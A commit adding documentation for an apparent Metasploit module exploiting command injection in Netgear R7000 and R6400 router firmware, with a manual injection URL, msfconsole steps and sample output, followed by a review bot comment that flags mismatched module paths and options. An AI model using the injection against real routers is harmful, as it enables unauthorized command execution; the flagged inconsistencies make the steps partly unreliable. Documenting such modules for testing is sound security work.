Start docs

bug/bundler_fix
Carter 2017-02-16 08:44:36 -05:00 committed by GitHub
parent 811f6d4d58
commit d775c66adf
1 changed files with 57 additions and 0 deletions

@ -0,0 +1,57 @@
The netgear_r7000_command_injection module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router.
## Vulnerable Application
Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and possibly earlier.
## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/netgear_r7000_cgibin_exec`
3. Do: `set RHOST <RouterIP>`
4. Do: `set PAYLOAD <payload>
5. Do: `run`
6. If the router is a R7000 or R6400, the module should run
## Options
**RHOST**
This should usually be the local IP address of the vulnerable router.
**PAYLOAD**
The valid payloads are `unix cmd` payloads _only_, as this is a command execution module
## Scenarios
Sample output of what it should look like.
```
msf > use auxiliary/scanner/http/netgear_r7000_command_injection
msf auxiliary(netgear_r7000_command_injection) > options
Module options (auxiliary/scanner/http/netgear_r7000_command_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes Command line to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The remote target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
msf auxiliary(netgear_r7000_command_injection) > set CMD echo "cowsay"
CMD => echo 'cowsay'
msf auxiliary(netgear_r7000_command_injection) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(netgear_r7000_command_injection) > check
[*] 192.168.1.1:80 The target service is running, but could not be validated.
msf auxiliary(netgear_r7000_command_injection) > run
[*] Sending request to 192.168.1.1
[*] Auxiliary module execution completed
msf auxiliary(netgear_r7000_command_injection) >
```
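Review bot: The module path in Verification Steps step 2 (`use exploit/linux/http/netgear_r7000_cgibin_exec`) does not match the Scenarios transcript, which loads `auxiliary/scanner/http/netgear_r7000_command_injection`. The Options section also documents `PAYLOAD`, but the option table in the transcript lists `CMD` and no payload. Decide which module this file documents and make the steps, the Options section and the sample output agree. Step 4 is missing its closing backtick after `set PAYLOAD <payload>`. In the transcript, `set CMD echo "cowsay"` is echoed back as `CMD => echo 'cowsay'`; the quoting should match what a real run prints. Since `check` reports "could not be validated" and `run` prints no command output, the Scenarios section should add a sentence on how the user confirms that the command executed on the router.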